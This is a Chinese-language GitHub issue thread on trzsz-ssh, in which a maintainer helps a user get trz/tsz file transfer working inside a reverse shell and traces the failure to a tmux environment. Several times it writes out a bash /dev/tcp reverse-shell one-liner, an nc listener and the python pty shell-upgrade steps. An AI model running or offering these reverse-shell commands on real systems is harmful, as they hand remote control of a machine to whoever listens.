### ISSUE TITLE
tssh在反弹shell中无法使用trz,tsz

### ISSUE THREAD

**Issue by engcn** [trzsz/trzsz-ssh#30]
服务端：
nc -lkvp 6767
客户端：
bash -i >& /dev/tcp/192.168.70.3/6767 0>&1
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/a55bcfa4-36fb-45d7-a64d-4906d2b826f1)

**Comment by lonnywong** [comment]
正确用法：
- 服务器：
```sh
1、trzsz bash
2、nc -lnv 1337
4、python -c 'import pty; pty.spawn("/bin/bash")' 
5、<ctrl + z>
6、stty raw -echo; fg
7、export TERM=xterm-256color
8、trz / tsz
9、exit
10、exit
11、reset
# 注意，退出时，输入的字符可能看不见，但是不影响。
```

- 客户端：
```
3、bash -i >& /dev/tcp/192.168.0.1/1337 0>&1
```

**Comment by engcn** [comment]
我按这个步骤，还是没有成功，我第4步和第7步执行的有问题吗？

**Comment by lonnywong** [comment]
在 nc 的前面，只有一个 tssh xxx 登录，没有其他额外的操作了吧？

**Comment by engcn** [comment]
没有了，全程如下
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/7c46bf19-73d1-43fe-aa03-d60eace7f851)

**Comment by lonnywong** [comment]
有额外的操作，tmux 就是问题所在。
1、没有 tmux 应该可以。
2、tmux 之后，先执行 `trzsz -r bash`，然后再 nc 应该也可以。

**Comment by engcn** [comment]
我上个图中，虽然开过tmux，但是又退出了，才执行的nc， 那我重新来一遍
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/a65bea2b-afb8-4864-9584-26c53535ef3a)

**Comment by lonnywong** [comment]
奇怪了，在我这里是可以的，你打点日志出来看看？

```
tssh --tracelog tcc
echo -e '<ENABLE_TRZSZ_TRACE_LOG\x3E'
# 你会看到一个日志路径，在你本地的电脑上的，可以另外开一个终端，tail -f 查看
# 然后执行 nc 步骤，卡住一段时间（ 十多秒 ）之后，把日志里的内容发出来看看。
```

**Comment by engcn** [comment]
日志发你邮箱了

**Comment by lonnywong** [comment]
你选了文件之后，运行 trz 的机器没有响应，是 trz 进程被杀了？

**Comment by engcn** [comment]
现在卡在那里了，我查看进程好像不存在










&nbsp;




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "trzsz/trzsz-ssh"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2023年7月4日(星期二) 晚上11:52
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [trzsz/trzsz-ssh] tssh在反弹shell中无法使用trz,tsz (Issue #30)





 
你选了文件之后，运行 trz 的机器没有响应，是 trz 进程被杀了？

**Comment by lonnywong** [comment]
你是怎么运行 `bash -i >& /dev/tcp/192.168.70.3/6767 0>&1` 这个反弹出来的 shell ？应该是这个进程被杀了，或者它的父进程被杀了，导致它的所有子进程全被杀了。

**Comment by engcn** [comment]
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/df9783a2-3bb8-4723-98e3-51f2792cfa01)

**Comment by lonnywong** [comment]
python 进程还在吗？看看系统日志，有没有被杀的原因？

**Comment by engcn** [comment]
python进程在，系统日志没看到有错误
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/2e3af107-8715-4eb0-a6a4-5ada8da77371)
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/53656e0d-a7ae-447a-913b-b91cd5e6621c)

**Comment by lonnywong** [comment]
运行 trz 之后，先不选文件，在另一个终端 dlv attach `trz 进程号` ，然后开始调试，回去选文件，看看 trz 是不是在哪里出错了？

**Comment by lonnywong** [comment]
你说 python 进程还在，好像不是同一个，看看父子进程关系，python 进程应该有个父进程是 bash，也有个子进程是 bash。

**Comment by lonnywong** [comment]
对了，你能运行 python 这个命令吗？是不是要用 python2 或 python3 ？

**Comment by lonnywong** [comment]
可以自己编译一个，也可以直接 `c` 看看 `trz` 是怎么退出的。

**Comment by engcn** [comment]
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/cf2cb3fc-a5e5-4b52-8b04-5c5fe2875b7b)
dlv返回的字符串
#CFG:eJwszEEKwjAQBdC7/PUsYtEqc5lQdazRNhPqHxTFu4vQ7Vu8D45xeZS3QTdpe9jt+ySYhjpCMToEbXH6ySdoJ2CZzYPQLgk4xyt7s

**Comment by lonnywong** [comment]
奇怪了，这个 `#CFG:xxx` 应该输出到反弹 shell 那边才符合预期。

执行下面这个命令看看？（ 要 trz 进程存在时执行 ）
```
ls -al /proc/`pidof trz`/fd
```

**Comment by engcn** [comment]
选择文件之后，trz进程还在
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/35c29e0a-323c-4893-bba9-08e9cf1ac7f2)

**Comment by lonnywong** [comment]
trz 使用 python 的版本看看行不行？

**Comment by engcn** [comment]
没安装成功
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/a56d9330-e1d0-41ee-a1da-9397cd96acce)

**Comment by lonnywong** [comment]
这是安装成功了，trz -v 看看

**Comment by lonnywong** [comment]
把 go 版先卸载了吧，因为它的 PATH 在前面了。

**Comment by lonnywong** [comment]
重新登录一下，python 版应该是在 /usr/local/bin 中

**Comment by engcn** [comment]
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/223f8a89-2481-4a92-a93c-d9938c9d5e00)

**Comment by engcn** [comment]
不行，
[pmtool@ip-172-31-63-190 ~]$ usr/local/bin/trz -v
-bash: usr/local/bin/trz: No such file or directory
[pmtool@ip-172-31-63-190 ~]$

**Comment by engcn** [comment]
不行
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/49a64a5e-e143-44e5-98ad-93aeb6b4d063)

**Comment by engcn** [comment]
哦哦，你测试的客户端是本地电脑吗？这是我的3个端
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/b25cbb61-64b7-4009-a957-bbdb3be62c17)

**Comment by lonnywong** [comment]
我知道了，可能是 `trz` 发现了你有 tmux 环境。在反弹 shell 那里，执行 `echo $TMUX` 看看？

**Comment by engcn** [comment]
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/80cbd019-e0d5-4c09-bda9-b0539b2319dd)

**Comment by lonnywong** [comment]
是这个问题了，怎么反弹 shell 里会有 tmux 环境呢，是不是你在 bash 之类配置了 tmux 自动启动之类的？

**Comment by engcn** [comment]
的确是这个原因，
我的客户端命令在tmux中执行的：
bash -i >& /dev/tcp/192.168.70.3/6767 0>&1
客户端命令不在tmux中执行，就可以了
![image](https://github.com/trzsz/trzsz-ssh/assets/26758766/55b92248-80dc-4b48-9e97-cf363a486f22)

**Comment by engcn** [comment]
谢谢大佬

**Comment by lonnywong** [comment]
@engcn 已更新到 trzsz 的文档中，中文：[https://trzsz.github.io/cn/ ](https://trzsz.github.io/cn/)，英文：[https://trzsz.github.io/](https://trzsz.github.io/)
